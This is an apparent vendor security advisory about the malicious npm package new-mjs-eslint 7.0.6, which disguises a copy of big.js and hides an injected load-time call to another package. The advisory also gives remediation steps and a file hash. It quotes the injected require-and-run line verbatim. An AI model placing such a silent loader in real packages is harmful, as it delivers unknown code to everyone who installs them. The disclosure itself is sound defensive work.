Which versions of new-mjs-eslint are malicious?

The following npm versions of new-mjs-eslint are flagged malicious: 7.0.6. Treat any of these as compromised.

How do I remediate new-mjs-eslint if I installed it?

Remove new-mjs-eslint from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is new-mjs-eslint part of a known attack campaign?

Yes — new-mjs-eslint is associated with the IN-MAL-2026-007070 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect new-mjs-eslint in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking new-mjs-eslint and packages like it before any post-install script runs.

Malicious package

new-mjs-eslintnpm

Malicious code in new-mjs-eslint (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6226

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall new-mjs-eslint

What this malware does

Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.

Malicious versions

1 flagged

7.0.6

Indicators of compromise (SHA-256)

b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e

Frequently asked questions

No. new-mjs-eslint on npm has been identified as a malicious package (version 7.0.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007070

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection